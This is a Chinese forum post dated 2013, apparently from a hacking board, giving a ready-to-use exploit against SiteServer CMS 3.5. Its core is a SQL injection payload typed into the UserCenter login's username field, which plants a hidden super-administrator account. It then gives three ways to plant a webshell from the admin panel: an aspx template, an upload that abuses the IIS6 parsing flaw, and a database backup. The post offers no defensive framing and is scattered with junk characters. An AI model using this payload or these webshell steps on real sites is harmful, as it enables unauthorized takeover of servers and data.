经测试秒杀最新的3.5版
% ]& N' ?& d! S7 Istieserver官网:www.siteserver.cn* w3 o: D. X5 L m+ [% n# P
EXP:+ {$ y4 W' D2 _7 k( V
直接访问UserCenter/login.aspx
6 a- H/ G. F" |+ ^# z8 |# o" b+ ?" ^用户名处输入:2 d, b. V) J6 ]' V: `
1 q) J! `' m/ I/ ?123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–& l8 ~/ y3 X/ f1 i$ z& s) I
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
8 E* J/ `/ L6 U之后再访问后台SiteServer/login.aspx用插入的用户登陆0 z0 o4 O! V! X9 [' G5 a% j
后台拿webshell的三种方法:
& @2 o3 O2 Q7 R: @8 s4 B& J一、
0 a4 Z0 l& V2 w% u站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
- A/ h0 J& k7 ~二、 Y' V: F; Z. M
成员权限-》添加用户-》用户名为:1.asp
8 i0 u( D, j. v6 d6 o- p- rhttp://127.0.0.1/usercenter/
, m5 N- i2 R" ~0 r. v9 I$ g1 C用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
! `+ w) `" f8 P6 A B(ps:后台添加用户时不会验证是否含有非法字符)
$ _" P7 B: z/ n, C6 N0 u' ?. w1 x三、) D7 s' t' `# n/ z8 ?& V; M
系统工具-》实用工具-》机器参数查看
5 O2 ^$ r/ T, O可以看到数据库类型、名称,WEB路径' T2 D& K3 @) F6 c% w8 _
系统工具-》数据库工具-》SQL语句查询
, f6 X4 A% q, H" D, i- S+ v0 W这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对